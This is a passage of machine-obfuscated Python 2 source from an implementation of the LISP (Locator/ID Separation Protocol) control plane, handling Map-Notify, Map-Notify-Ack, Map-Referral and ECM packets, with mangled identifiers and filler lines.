if 41 - 41: I1Ii111 * OoooooooOO / OoOoOO00 + OoO0O00 . OoOoOO00 + I1Ii111
if 9 - 9: IiII . I11i . I1Ii111 / i1IIi * OoOoOO00 - O0
for Oo0iIIiiIiiI in range ( OOoo . rloc_count ) :
O0000O00O00OO = lisp_rloc_record ( )
iIIiIi11i = O0000O00O00OO . decode ( iIIiIi11i , None )
O0000O00O00OO . print_record ( " " )
if ( OOoo . group . is_null ( ) ) : continue
if ( O0000O00O00OO . rle == None ) : continue
if 3 - 3: O0 / iIii1I11I1II1 % IiII + I11i
if 43 - 43: Oo0Ooo % I11i
if 53 - 53: OoOoOO00 % OoooooooOO * o0oOOo0O0Ooo % OoooooooOO
if 47 - 47: iIii1I11I1II1 - OOooOOo + I1ii11iIi11i * ooOoO0o + Oo0Ooo + OoO0O00
if 64 - 64: OoOoOO00 - OoOoOO00 . OoooooooOO + ooOoO0o
O0ooOoo0O000O = OoOoooooO00oo . rloc_set [ 0 ] . stats if len ( OoOoooooO00oo . rloc_set ) != 0 else None
if 32 - 32: I1Ii111 * iII111i - OoO0O00 / ooOoO0o % i11iIiiIii + OoOoOO00
if 66 - 66: iII111i - O0 . I1Ii111 * i1IIi / OoO0O00 / II111iiii
if 35 - 35: ooOoO0o * OOooOOo / I11i % I11i / OoooooooOO . I1Ii111
if 70 - 70: I1ii11iIi11i % I1ii11iIi11i / oO0o
OooO0ooO0o0OO = lisp_rloc ( )
OooO0ooO0o0OO . store_rloc_from_record ( O0000O00O00OO , None , OoOoooooO00oo . mapping_source )
if ( O0ooOoo0O000O != None ) : OooO0ooO0o0OO . stats = copy . deepcopy ( O0ooOoo0O000O )
if 85 - 85: OoOoOO00 % I11i / Oo0Ooo + I11i - Oo0Ooo
if ( Ooo0 and OooO0ooO0o0OO . is_rtr ( ) == False ) : continue
if 20 - 20: IiII
OoOoooooO00oo . rloc_set = [ OooO0ooO0o0OO ]
OoOoooooO00oo . build_best_rloc_set ( )
lisp_write_ipc_map_cache ( True , OoOoooooO00oo )
if 81 - 81: Oo0Ooo / I1Ii111
lprint ( "Update {} map-cache entry with RLE {}" . format ( green ( OoOoooooO00oo . print_eid_tuple ( ) , False ) , OooO0ooO0o0OO . rle . print_rle ( False ) ) )
if 20 - 20: o0oOOo0O0Ooo + ooOoO0o % i1IIi
if 51 - 51: iII111i - ooOoO0o
if 32 - 32: IiII - i11iIiiIii
return
if 41 - 41: Ii1I % Ii1I * oO0o - I11i + iIii1I11I1II1 . ooOoO0o
if 30 - 30: Ii1I * iII111i . II111iiii / i1IIi
if 77 - 77: oO0o . IiII + I1ii11iIi11i . i1IIi
if 49 - 49: I1Ii111 . OoooooooOO / o0oOOo0O0Ooo - iII111i - iII111i - i11iIiiIii
if 37 - 37: OOooOOo
if 79 - 79: I1Ii111 - OoO0O00 + ooOoO0o + oO0o . i11iIiiIii + i1IIi
if 32 - 32: IiII . ooOoO0o / OoO0O00 / iII111i . iIii1I11I1II1 % IiII
if 28 - 28: I1Ii111 + OoooooooOO + IiII . ooOoO0o . I1IiiI / oO0o
def lisp_process_map_notify ( lisp_sockets , orig_packet , source ) :
oooO0oo0ooO = lisp_map_notify ( "" )
ii1i1II = oooO0oo0ooO . decode ( orig_packet )
if ( ii1i1II == None ) :
lprint ( "Could not decode Map-Notify packet" )
return
if 66 - 66: Ii1I - I11i + Oo0Ooo . ooOoO0o
if 89 - 89: IiII . II111iiii / OoO0O00 + I1ii11iIi11i * i11iIiiIii
oooO0oo0ooO . print_notify ( )
if 85 - 85: o0oOOo0O0Ooo - Oo0Ooo / I1Ii111
if 100 - 100: OoO0O00 * iIii1I11I1II1 - IiII . i1IIi % i11iIiiIii % Oo0Ooo
if 22 - 22: ooOoO0o - OOooOOo
if 90 - 90: i11iIiiIii . i11iIiiIii - iIii1I11I1II1
if 20 - 20: ooOoO0o - i11iIiiIii
o0 = source . print_address ( )
if ( oooO0oo0ooO . alg_id != 0 or oooO0oo0ooO . auth_len != 0 ) :
Ii1IIII = None
for iII1 in lisp_map_servers_list :
if ( iII1 . find ( o0 ) == - 1 ) : continue
Ii1IIII = lisp_map_servers_list [ iII1 ]
if 23 - 23: OoO0O00 + I1IiiI / I1ii11iIi11i * I1ii11iIi11i % ooOoO0o
if ( Ii1IIII == None ) :
lprint ( ( " Could not find Map-Server {} to authenticate " + "Map-Notify" ) . format ( o0 ) )
if 83 - 83: I1IiiI * i11iIiiIii - I1ii11iIi11i + I11i
return
if 33 - 33: OoO0O00 . OoooooooOO % iII111i / oO0o * Ii1I + ooOoO0o
if 29 - 29: oO0o
Ii1IIII . map_notifies_received += 1
if 21 - 21: i11iIiiIii . o0oOOo0O0Ooo
oooOoO0 = lisp_verify_auth ( ii1i1II , oooO0oo0ooO . alg_id ,
oooO0oo0ooO . auth_data , Ii1IIII . password )
if 78 - 78: Oo0Ooo
lprint ( " Authentication {} for Map-Notify" . format ( "succeeded" if oooOoO0 else "failed" ) )
if 77 - 77: oO0o % Oo0Ooo % O0
if ( oooOoO0 == False ) : return
else :
Ii1IIII = lisp_ms ( o0 , None , "" , 0 , "" , False , False , False , False , 0 , 0 , 0 ,
None )
if 51 - 51: IiII % IiII + OOooOOo . II111iiii / I1ii11iIi11i
if 4 - 4: o0oOOo0O0Ooo % I1IiiI * o0oOOo0O0Ooo * OoOoOO00 - Ii1I
if 61 - 61: OoooooooOO - OoOoOO00 . O0 / ooOoO0o . Ii1I
if 41 - 41: Oo0Ooo / OoOoOO00 % I1Ii111 - O0
if 19 - 19: I1IiiI % I1Ii111 - O0 . iIii1I11I1II1 . I11i % O0
if 88 - 88: ooOoO0o
iIIiIi11i = oooO0oo0ooO . eid_records
if ( oooO0oo0ooO . record_count == 0 ) :
lisp_send_map_notify_ack ( lisp_sockets , iIIiIi11i , oooO0oo0ooO , Ii1IIII )
return
if 52 - 52: iIii1I11I1II1 % ooOoO0o * iIii1I11I1II1
if 20 - 20: i11iIiiIii * I11i
if 29 - 29: IiII / OOooOOo
if 39 - 39: O0 + II111iiii
if 94 - 94: OOooOOo % I1ii11iIi11i % O0 + iII111i
if 62 - 62: iIii1I11I1II1 . OoOoOO00 / iIii1I11I1II1 + IiII
if 31 - 31: Ii1I . OoO0O00 . Ii1I + OoO0O00 * iIii1I11I1II1 . iII111i
if 42 - 42: O0 / oO0o % O0 . i1IIi % OOooOOo
OOoo = lisp_eid_record ( )
ii1i1II = OOoo . decode ( iIIiIi11i )
if ( ii1i1II == None ) : return
if 13 - 13: I1IiiI % ooOoO0o + OOooOOo
OOoo . print_record ( " " , False )
if 91 - 91: oO0o - ooOoO0o
for Oo0iIIiiIiiI in range ( OOoo . rloc_count ) :
O0000O00O00OO = lisp_rloc_record ( )
ii1i1II = O0000O00O00OO . decode ( ii1i1II , None )
if ( ii1i1II == None ) :
lprint ( " Could not decode RLOC-record in Map-Notify packet" )
return
if 20 - 20: i1IIi . IiII / o0oOOo0O0Ooo / I11i
O0000O00O00OO . print_record ( " " )
if 27 - 27: ooOoO0o . ooOoO0o - Ii1I % i11iIiiIii
if 74 - 74: I1Ii111 - II111iiii % o0oOOo0O0Ooo
if 7 - 7: I1IiiI + OoooooooOO + o0oOOo0O0Ooo . OoooooooOO
if 29 - 29: iII111i * O0 + I1IiiI * IiII + iII111i - IiII
if 38 - 38: I1ii11iIi11i - Ii1I % OoooooooOO
if ( OOoo . group . is_null ( ) == False ) :
if 43 - 43: iIii1I11I1II1 / OoOoOO00
if 13 - 13: o0oOOo0O0Ooo / I1Ii111
if 67 - 67: OoooooooOO . oO0o * OoOoOO00 - OoooooooOO
if 32 - 32: oO0o
if 72 - 72: I1IiiI
lprint ( "Send {} Map-Notify IPC message to ITR process" . format ( green ( OOoo . print_eid_tuple ( ) , False ) ) )
if 34 - 34: ooOoO0o % II111iiii / ooOoO0o
if 87 - 87: Oo0Ooo
oOO0O = lisp_control_packet_ipc ( orig_packet , o0 , "lisp-itr" , 0 )
lisp_ipc ( oOO0O , lisp_sockets [ 2 ] , "lisp-core-pkt" )
if 7 - 7: iIii1I11I1II1
if 85 - 85: iIii1I11I1II1 . O0
if 43 - 43: II111iiii / OoOoOO00 + OOooOOo % Oo0Ooo * OOooOOo
if 62 - 62: ooOoO0o * OOooOOo . I11i + Oo0Ooo - I1Ii111
if 48 - 48: I1Ii111 * Oo0Ooo % OoO0O00 % Ii1I
lisp_send_map_notify_ack ( lisp_sockets , iIIiIi11i , oooO0oo0ooO , Ii1IIII )
return
if 8 - 8: OoO0O00 . OoO0O00
if 29 - 29: I11i + OoooooooOO % o0oOOo0O0Ooo - I1Ii111
if 45 - 45: II111iiii - OOooOOo / oO0o % O0 . iII111i . iII111i
if 82 - 82: iIii1I11I1II1 % Oo0Ooo * i1IIi - I1Ii111 - I1ii11iIi11i / iII111i
if 24 - 24: IiII
if 95 - 95: IiII + OoOoOO00 * OOooOOo
if 92 - 92: OoOoOO00 + ooOoO0o . iII111i
if 59 - 59: iIii1I11I1II1 % I1Ii111 + I1ii11iIi11i . OoOoOO00 * Oo0Ooo / I1Ii111
def lisp_process_map_notify_ack ( packet , source ) :
oooO0oo0ooO = lisp_map_notify ( "" )
packet = oooO0oo0ooO . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Notify-Ack packet" )
return
if 41 - 41: i1IIi / IiII
if 73 - 73: o0oOOo0O0Ooo % ooOoO0o
oooO0oo0ooO . print_notify ( )
if 72 - 72: OoO0O00 * OoOoOO00 % I1IiiI - OOooOOo . Oo0Ooo
if 70 - 70: ooOoO0o . o0oOOo0O0Ooo * II111iiii - O0
if 74 - 74: oO0o % I1IiiI / oO0o / Oo0Ooo / ooOoO0o
if 29 - 29: ooOoO0o + iIii1I11I1II1 + OoO0O00 - o0oOOo0O0Ooo
if 74 - 74: II111iiii - II111iiii + ooOoO0o + Oo0Ooo % iIii1I11I1II1
if ( oooO0oo0ooO . record_count < 1 ) :
lprint ( "No EID-prefix found, cannot authenticate Map-Notify-Ack" )
return
if 90 - 90: oO0o / o0oOOo0O0Ooo . o0oOOo0O0Ooo % OoOoOO00 / IiII
if 13 - 13: oO0o + IiII
OOoo = lisp_eid_record ( )
if 36 - 36: oO0o - OoOoOO00 . O0 % IiII
if ( OOoo . decode ( oooO0oo0ooO . eid_records ) == None ) :
lprint ( "Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack" )
return
if 65 - 65: Oo0Ooo - i11iIiiIii * OoOoOO00 . I1Ii111 . iIii1I11I1II1
OOoo . print_record ( " " , False )
if 48 - 48: iIii1I11I1II1 - oO0o / OoO0O00 + O0 . Ii1I + I1Ii111
iiI1Ii1I = OOoo . print_eid_tuple ( )
if 17 - 17: OoOoOO00 . Oo0Ooo - I1Ii111 / I1Ii111 + I11i % i1IIi
if 31 - 31: OoooooooOO . O0 / OoO0O00 . I1Ii111
if 41 - 41: OoooooooOO + iII111i . OOooOOo
if 73 - 73: oO0o + i1IIi + i11iIiiIii / I1ii11iIi11i
if ( oooO0oo0ooO . alg_id != LISP_NONE_ALG_ID and oooO0oo0ooO . auth_len != 0 ) :
O0oiiii1i1i11I = lisp_sites_by_eid . lookup_cache ( OOoo . eid , True )
if ( O0oiiii1i1i11I == None ) :
I11oo = bold ( "Site not found" , False )
lprint ( ( "{} for EID {}, cannot authenticate Map-Notify-Ack" ) . format ( I11oo , green ( iiI1Ii1I , False ) ) )
if 100 - 100: I1IiiI % ooOoO0o % OoooooooOO / i11iIiiIii + i11iIiiIii % IiII
return
if 39 - 39: Ii1I % o0oOOo0O0Ooo + OOooOOo / iIii1I11I1II1
i11I = O0oiiii1i1i11I . site
if 40 - 40: iIii1I11I1II1 / iII111i % OOooOOo % i11iIiiIii
if 57 - 57: II111iiii % OoO0O00 * i1IIi
if 19 - 19: ooOoO0o . iIii1I11I1II1 + I1ii11iIi11i + I1ii11iIi11i / o0oOOo0O0Ooo . Oo0Ooo
if 9 - 9: II111iiii % OoooooooOO
i11I . map_notify_acks_received += 1
if 4 - 4: i1IIi * i11iIiiIii % OoooooooOO + OoOoOO00 . oO0o
o0O = oooO0oo0ooO . key_id
if ( i11I . auth_key . has_key ( o0O ) == False ) : o0O = 0
o000o0OOo = i11I . auth_key [ o0O ]
if 95 - 95: I1ii11iIi11i * OoOoOO00 % o0oOOo0O0Ooo / O0 + ooOoO0o % OOooOOo
oooOoO0 = lisp_verify_auth ( packet , oooO0oo0ooO . alg_id ,
oooO0oo0ooO . auth_data , o000o0OOo )
if 48 - 48: i1IIi + IiII - iIii1I11I1II1 . i11iIiiIii % OOooOOo + I1ii11iIi11i
o0O = "key-id {}" . format ( o0O ) if o0O == oooO0oo0ooO . key_id else "bad key-id {}" . format ( oooO0oo0ooO . key_id )
if 95 - 95: ooOoO0o + OoOoOO00 . II111iiii + Ii1I
if 81 - 81: OoooooooOO / OOooOOo / Oo0Ooo
lprint ( " Authentication {} for Map-Notify-Ack, {}" . format ( "succeeded" if oooOoO0 else "failed" , o0O ) )
if 26 - 26: iII111i
if ( oooOoO0 == False ) : return
if 93 - 93: Oo0Ooo + I1IiiI % OoOoOO00 / OOooOOo / I1ii11iIi11i
if 6 - 6: IiII
if 68 - 68: Oo0Ooo
if 83 - 83: OOooOOo / iIii1I11I1II1 . OoO0O00 - oO0o % Oo0Ooo
if 30 - 30: Ii1I . OoOoOO00 / oO0o . OoO0O00
if ( oooO0oo0ooO . retransmit_timer ) : oooO0oo0ooO . retransmit_timer . cancel ( )
if 93 - 93: i11iIiiIii
iI1IIiIiIiII = source . print_address ( )
iII1 = oooO0oo0ooO . nonce_key
if 33 - 33: i1IIi % OoooooooOO + Oo0Ooo % I1IiiI / ooOoO0o
if ( lisp_map_notify_queue . has_key ( iII1 ) ) :
oooO0oo0ooO = lisp_map_notify_queue . pop ( iII1 )
if ( oooO0oo0ooO . retransmit_timer ) : oooO0oo0ooO . retransmit_timer . cancel ( )
lprint ( "Dequeue Map-Notify from retransmit queue, key is: {}" . format ( iII1 ) )
if 40 - 40: IiII % IiII
else :
lprint ( "Map-Notify with nonce 0x{} queue entry not found for {}" . format ( oooO0oo0ooO . nonce_key , red ( iI1IIiIiIiII , False ) ) )
if 9 - 9: I1IiiI * i1IIi + OOooOOo * OoOoOO00
if 8 - 8: iII111i
return
if 51 - 51: I1IiiI
if 72 - 72: ooOoO0o / I1ii11iIi11i . Ii1I * iII111i . iIii1I11I1II1
if 35 - 35: OoO0O00 . OoOoOO00 % O0 * OoO0O00
if 68 - 68: OOooOOo
if 87 - 87: IiII * IiII - OoO0O00 / I1ii11iIi11i + OOooOOo / i11iIiiIii
if 21 - 21: o0oOOo0O0Ooo / oO0o + oO0o + Oo0Ooo / o0oOOo0O0Ooo
if 39 - 39: i11iIiiIii - OoO0O00 - i11iIiiIii / OoooooooOO
if 15 - 15: i1IIi . iII111i + IiII / I1ii11iIi11i - i1IIi / iII111i
def lisp_map_referral_loop ( mr , eid , group , action , s ) :
if ( action not in ( LISP_DDT_ACTION_NODE_REFERRAL ,
LISP_DDT_ACTION_MS_REFERRAL ) ) : return ( False )
if 27 - 27: OoOoOO00 / OoooooooOO + i1IIi % iIii1I11I1II1 / OoO0O00
if ( mr . last_cached_prefix [ 0 ] == None ) : return ( False )
if 73 - 73: I1ii11iIi11i / OoOoOO00 / IiII + oO0o
if 73 - 73: I11i * o0oOOo0O0Ooo * I1IiiI . OoooooooOO % I1Ii111
if 9 - 9: oO0o % I1Ii111 . O0 + I1ii11iIi11i - Ii1I - I1ii11iIi11i
if 57 - 57: i11iIiiIii
OOIi = False
if ( group . is_null ( ) == False ) :
OOIi = mr . last_cached_prefix [ 1 ] . is_more_specific ( group )
if 21 - 21: iIii1I11I1II1 / I1IiiI / iII111i
if ( OOIi == False ) :
OOIi = mr . last_cached_prefix [ 0 ] . is_more_specific ( eid )
if 19 - 19: Oo0Ooo / iIii1I11I1II1 / I11i
if 71 - 71: iIii1I11I1II1 * I1IiiI
if ( OOIi ) :
IiI1ii1 = lisp_print_eid_tuple ( eid , group )
iiOo0OOoOO00o = lisp_print_eid_tuple ( mr . last_cached_prefix [ 0 ] ,
mr . last_cached_prefix [ 1 ] )
if 1 - 1: II111iiii % I1IiiI - iIii1I11I1II1
lprint ( ( "Map-Referral prefix {} from {} is not more-specific " + "than cached prefix {}" ) . format ( green ( IiI1ii1 , False ) , s ,
# iII111i + i11iIiiIii
iiOo0OOoOO00o ) )
if 74 - 74: iII111i + OoO0O00 - I11i
return ( OOIi )
if 91 - 91: O0 * I1Ii111 . iIii1I11I1II1
if 1 - 1: I11i
if 12 - 12: ooOoO0o - Oo0Ooo / OoO0O00 . I1ii11iIi11i / OOooOOo
if 51 - 51: ooOoO0o % I11i + IiII + oO0o + O0 % ooOoO0o
if 38 - 38: OoO0O00 - iIii1I11I1II1 % ooOoO0o + I1ii11iIi11i - Ii1I
if 69 - 69: OOooOOo / OoooooooOO % ooOoO0o % iIii1I11I1II1 / OoO0O00 + iIii1I11I1II1
if 47 - 47: II111iiii % O0 / I1IiiI / iIii1I11I1II1 * I11i
def lisp_process_map_referral ( lisp_sockets , packet , source ) :
if 60 - 60: O0 * iII111i % I1ii11iIi11i
OOOOo0ooOoOO = lisp_map_referral ( )
packet = OOOOo0ooOoOO . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Referral packet" )
return
if 92 - 92: OoOoOO00 / iIii1I11I1II1
OOOOo0ooOoOO . print_map_referral ( )
if 67 - 67: i1IIi + i11iIiiIii - i1IIi % OoOoOO00
o0 = source . print_address ( )
OO00OO = OOOOo0ooOoOO . nonce
if 3 - 3: I1IiiI % ooOoO0o
if 32 - 32: OOooOOo / i1IIi / OOooOOo
if 97 - 97: ooOoO0o * Oo0Ooo * OoooooooOO * I1IiiI
if 45 - 45: Oo0Ooo
for i1i1IIIIIIIi in range ( OOOOo0ooOoOO . record_count ) :
OOoo = lisp_eid_record ( )
packet = OOoo . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Referral packet" )
return
if 27 - 27: oO0o / IiII - iIii1I11I1II1 / o0oOOo0O0Ooo % OOooOOo * iIii1I11I1II1
OOoo . print_record ( " " , True )
if 40 - 40: oO0o - II111iiii * OOooOOo % OoooooooOO
if 52 - 52: OOooOOo + OoO0O00
if 96 - 96: OOooOOo % O0 - Oo0Ooo % oO0o / I1IiiI . i1IIi
if 42 - 42: i1IIi
iII1 = str ( OO00OO )
if ( iII1 not in lisp_ddt_map_requestQ ) :
lprint ( ( "Map-Referral nonce 0x{} from {} not found in " + "Map-Request queue, EID-record ignored" ) . format ( lisp_hex_string ( OO00OO ) , o0 ) )
if 52 - 52: OoO0O00 % iII111i % O0
if 11 - 11: i1IIi / i11iIiiIii + Ii1I % Oo0Ooo % O0
continue
if 50 - 50: oO0o . I1Ii111
ii1 = lisp_ddt_map_requestQ [ iII1 ]
if ( ii1 == None ) :
lprint ( ( "No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored" ) . format ( lisp_hex_string ( OO00OO ) , o0 ) )
if 38 - 38: iIii1I11I1II1 . Ii1I
continue
if 82 - 82: OOooOOo * Ii1I + I1ii11iIi11i . OoO0O00
if 15 - 15: O0
if 44 - 44: Ii1I . Oo0Ooo . I1Ii111 + oO0o
if 32 - 32: OOooOOo - II111iiii + IiII * iIii1I11I1II1 - Oo0Ooo
if 25 - 25: ooOoO0o
if 33 - 33: Oo0Ooo
if ( lisp_map_referral_loop ( ii1 , OOoo . eid , OOoo . group ,
OOoo . action , o0 ) ) :
ii1 . dequeue_map_request ( )
continue
if 11 - 11: I11i
if 55 - 55: i11iIiiIii * OoOoOO00 - OoOoOO00 * OoO0O00 / iII111i
ii1 . last_cached_prefix [ 0 ] = OOoo . eid
ii1 . last_cached_prefix [ 1 ] = OOoo . group
if 64 - 64: iIii1I11I1II1 . Ii1I * Oo0Ooo - OoO0O00
if 74 - 74: I1IiiI / o0oOOo0O0Ooo
if 53 - 53: iIii1I11I1II1 * oO0o
if 43 - 43: IiII * Oo0Ooo / OOooOOo % oO0o
i1O0OO00 = False
oOo00OoOoo = lisp_referral_cache_lookup ( OOoo . eid , OOoo . group ,
True )
if ( oOo00OoOoo == None ) :
i1O0OO00 = True
oOo00OoOoo = lisp_referral ( )
oOo00OoOoo . eid = OOoo . eid
oOo00OoOoo . group = OOoo . group
if ( OOoo . ddt_incomplete == False ) : oOo00OoOoo . add_cache ( )
elif ( oOo00OoOoo . referral_source . not_set ( ) ) :
lprint ( "Do not replace static referral entry {}" . format ( green ( oOo00OoOoo . print_eid_tuple ( ) , False ) ) )
if 11 - 11: OoOoOO00 * Oo0Ooo / I11i * OOooOOo
ii1 . dequeue_map_request ( )
continue
if 15 - 15: ooOoO0o - OOooOOo / OoooooooOO
if 41 - 41: OoOoOO00 . iII111i . i1IIi + oO0o
Ii1II1I = OOoo . action
oOo00OoOoo . referral_source = source
oOo00OoOoo . referral_type = Ii1II1I
oo0OOoOO0 = OOoo . store_ttl ( )
oOo00OoOoo . referral_ttl = oo0OOoOO0
oOo00OoOoo . expires = lisp_set_timestamp ( oo0OOoOO0 )
if 60 - 60: oO0o * I1Ii111
if 81 - 81: oO0o - OOooOOo - oO0o
if 54 - 54: oO0o % I11i
if 71 - 71: oO0o / I1ii11iIi11i . Ii1I % II111iiii
iiiii11i = oOo00OoOoo . is_referral_negative ( )
if ( oOo00OoOoo . referral_set . has_key ( o0 ) ) :
IiIiII11 = oOo00OoOoo . referral_set [ o0 ]
if 41 - 41: I1Ii111 . ooOoO0o - i11iIiiIii + Ii1I . OOooOOo . OoOoOO00
if ( IiIiII11 . updown == False and iiiii11i == False ) :
IiIiII11 . updown = True
lprint ( "Change up/down status for referral-node {} to up" . format ( o0 ) )
if 70 - 70: i1IIi % OoOoOO00 / iII111i + i11iIiiIii % ooOoO0o + IiII
elif ( IiIiII11 . updown == True and iiiii11i == True ) :
IiIiII11 . updown = False
lprint ( ( "Change up/down status for referral-node {} " + "to down, received negative referral" ) . format ( o0 ) )
if 58 - 58: OOooOOo / i11iIiiIii . Oo0Ooo % iII111i
if 92 - 92: OoOoOO00 / ooOoO0o % iII111i / iIii1I11I1II1
if 73 - 73: O0 % i11iIiiIii
if 16 - 16: O0
if 15 - 15: i1IIi % i11iIiiIii
if 18 - 18: Ii1I . OoO0O00 . iII111i * oO0o + O0
if 35 - 35: OoOoOO00 . oO0o / II111iiii
if 97 - 97: Ii1I + I1Ii111 / II111iiii
i1i1 = { }
for iII1 in oOo00OoOoo . referral_set : i1i1 [ iII1 ] = None
if 64 - 64: I11i / O0 + i1IIi * II111iiii
if 20 - 20: iIii1I11I1II1
if 9 - 9: OoO0O00
if 5 - 5: OOooOOo % iII111i % Oo0Ooo . I11i
for i1i1IIIIIIIi in range ( OOoo . rloc_count ) :
O0000O00O00OO = lisp_rloc_record ( )
packet = O0000O00O00OO . decode ( packet , None )
if ( packet == None ) :
lprint ( "Could not decode RLOC-record in Map-Referral packet" )
return
if 25 - 25: iIii1I11I1II1 * OoOoOO00 + ooOoO0o * I11i / I1Ii111 - I11i
O0000O00O00OO . print_record ( " " )
if 5 - 5: I1Ii111 * I11i . ooOoO0o . o0oOOo0O0Ooo - O0
if 39 - 39: OoO0O00
if 19 - 19: i1IIi
if 53 - 53: OOooOOo * O0 . iII111i
oOo0O = O0000O00O00OO . rloc . print_address ( )
if ( oOo00OoOoo . referral_set . has_key ( oOo0O ) == False ) :
IiIiII11 = lisp_referral_node ( )
IiIiII11 . referral_address . copy_address ( O0000O00O00OO . rloc )
oOo00OoOoo . referral_set [ oOo0O ] = IiIiII11
if ( o0 == oOo0O and iiiii11i ) : IiIiII11 . updown = False
else :
IiIiII11 = oOo00OoOoo . referral_set [ oOo0O ]
if ( i1i1 . has_key ( oOo0O ) ) : i1i1 . pop ( oOo0O )
if 3 - 3: OoooooooOO * I1Ii111 * IiII - OOooOOo * I1Ii111
IiIiII11 . priority = O0000O00O00OO . priority
IiIiII11 . weight = O0000O00O00OO . weight
if 78 - 78: iII111i
if 80 - 80: i1IIi * I1IiiI + OOooOOo
if 91 - 91: I1IiiI % OoOoOO00 * Oo0Ooo / I1ii11iIi11i
if 57 - 57: i11iIiiIii / o0oOOo0O0Ooo . II111iiii
if 63 - 63: O0
for iII1 in i1i1 : oOo00OoOoo . referral_set . pop ( iII1 )
if 64 - 64: i11iIiiIii / oO0o . oO0o - Oo0Ooo
iiI1Ii1I = oOo00OoOoo . print_eid_tuple ( )
if 48 - 48: i1IIi + I1ii11iIi11i + I1Ii111 - iII111i
if ( i1O0OO00 ) :
if ( OOoo . ddt_incomplete ) :
lprint ( "Suppress add {} to referral-cache" . format ( green ( iiI1Ii1I , False ) ) )
if 3 - 3: i1IIi + OoooooooOO * ooOoO0o + I1Ii111 % OOooOOo / IiII
else :
lprint ( "Add {}, referral-count {} to referral-cache" . format ( green ( iiI1Ii1I , False ) , OOoo . rloc_count ) )
if 70 - 70: oO0o + i1IIi % o0oOOo0O0Ooo - I11i
if 74 - 74: i11iIiiIii
else :
lprint ( "Replace {}, referral-count: {} in referral-cache" . format ( green ( iiI1Ii1I , False ) , OOoo . rloc_count ) )
if 93 - 93: I1Ii111 % OOooOOo * I1IiiI % iII111i / iIii1I11I1II1 + OoO0O00
if 6 - 6: I11i
if 70 - 70: ooOoO0o + OoooooooOO % OoOoOO00 % oO0o / Ii1I . I11i
if 63 - 63: I1ii11iIi11i - ooOoO0o . OOooOOo / O0 . iIii1I11I1II1 - Ii1I
if 6 - 6: Ii1I
if 60 - 60: iII111i + I1IiiI
if ( Ii1II1I == LISP_DDT_ACTION_DELEGATION_HOLE ) :
lisp_send_negative_map_reply ( ii1 . lisp_sockets , oOo00OoOoo . eid ,
oOo00OoOoo . group , ii1 . nonce , ii1 . itr , ii1 . sport , 15 , None , False )
ii1 . dequeue_map_request ( )
if 36 - 36: i1IIi . O0 . OoO0O00 % OOooOOo * I11i / Ii1I
if 16 - 16: Oo0Ooo
if ( Ii1II1I == LISP_DDT_ACTION_NOT_AUTH ) :
if ( ii1 . tried_root ) :
lisp_send_negative_map_reply ( ii1 . lisp_sockets , oOo00OoOoo . eid ,
oOo00OoOoo . group , ii1 . nonce , ii1 . itr , ii1 . sport , 0 , None , False )
ii1 . dequeue_map_request ( )
else :
lisp_send_ddt_map_request ( ii1 , True )
if 44 - 44: iIii1I11I1II1 - II111iiii . IiII . i1IIi
if 37 - 37: OoooooooOO + Oo0Ooo - Oo0Ooo + I1ii11iIi11i . I1Ii111 / I1IiiI
if 60 - 60: I1IiiI % Ii1I / I1Ii111 + Ii1I
if ( Ii1II1I == LISP_DDT_ACTION_MS_NOT_REG ) :
if ( oOo00OoOoo . referral_set . has_key ( o0 ) ) :
IiIiII11 = oOo00OoOoo . referral_set [ o0 ]
IiIiII11 . updown = False
if 43 - 43: I1ii11iIi11i + I11i
if ( len ( oOo00OoOoo . referral_set ) == 0 ) :
ii1 . dequeue_map_request ( )
else :
lisp_send_ddt_map_request ( ii1 , False )
if 83 - 83: II111iiii + o0oOOo0O0Ooo - I1Ii111
if 100 - 100: IiII - OoOoOO00 / I11i
if 33 - 33: I1Ii111 * OoOoOO00 . I1ii11iIi11i % I1Ii111
if ( Ii1II1I in ( LISP_DDT_ACTION_NODE_REFERRAL ,
LISP_DDT_ACTION_MS_REFERRAL ) ) :
if ( ii1 . eid . is_exact_match ( OOoo . eid ) ) :
if ( not ii1 . tried_root ) :
lisp_send_ddt_map_request ( ii1 , True )
else :
lisp_send_negative_map_reply ( ii1 . lisp_sockets ,
oOo00OoOoo . eid , oOo00OoOoo . group , ii1 . nonce , ii1 . itr ,
ii1 . sport , 15 , None , False )
ii1 . dequeue_map_request ( )
if 87 - 87: Oo0Ooo
else :
lisp_send_ddt_map_request ( ii1 , False )
if 65 - 65: ooOoO0o . I1IiiI
if 51 - 51: IiII
if 43 - 43: oO0o - I11i . i11iIiiIii
if ( Ii1II1I == LISP_DDT_ACTION_MS_ACK ) : ii1 . dequeue_map_request ( )
if 78 - 78: i11iIiiIii + Oo0Ooo * Ii1I - o0oOOo0O0Ooo % i11iIiiIii
return
if 30 - 30: I1IiiI % oO0o * OoooooooOO
if 64 - 64: I1IiiI
if 11 - 11: I1ii11iIi11i % iII111i / II111iiii % ooOoO0o % IiII
if 14 - 14: ooOoO0o / IiII . o0oOOo0O0Ooo
if 27 - 27: I1IiiI - OOooOOo . II111iiii * I1ii11iIi11i % ooOoO0o / I1IiiI
if 90 - 90: o0oOOo0O0Ooo / I1ii11iIi11i - oO0o - Ii1I - I1IiiI + I1Ii111
if 93 - 93: I1IiiI - I11i . I1IiiI - iIii1I11I1II1
if 1 - 1: O0 . Ii1I % Ii1I + II111iiii . oO0o
def lisp_process_ecm ( lisp_sockets , packet , source , ecm_port ) :
O0O00O = lisp_ecm ( 0 )
packet = O0O00O . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode ECM packet" )
return
if 24 - 24: o0oOOo0O0Ooo . I1Ii111 % O0
if 67 - 67: I1IiiI * Ii1I
O0O00O . print_ecm ( )
if 64 - 64: OOooOOo
iIIIIII = lisp_control_header ( )
if ( iIIIIII . decode ( packet ) == None ) :
lprint ( "Could not decode control header" )
return
if 90 - 90: iII111i . OoOoOO00 + i1IIi % ooOoO0o * I11i + OoooooooOO
if 2 - 2: o0oOOo0O0Ooo . II111iiii
I1IiiIIi = iIIIIII . type
del ( iIIIIII )
if 4 - 4: ooOoO0o . i11iIiiIii . i1IIi
if ( I1IiiIIi != LISP_MAP_REQUEST ) :
lprint ( "Received ECM without Map-Request inside" )
return
if 37 - 37: i11iIiiIii + OoO0O00 * Ii1I
if 100 - 100: IiII . I1Ii111 + II111iiii + i1IIi
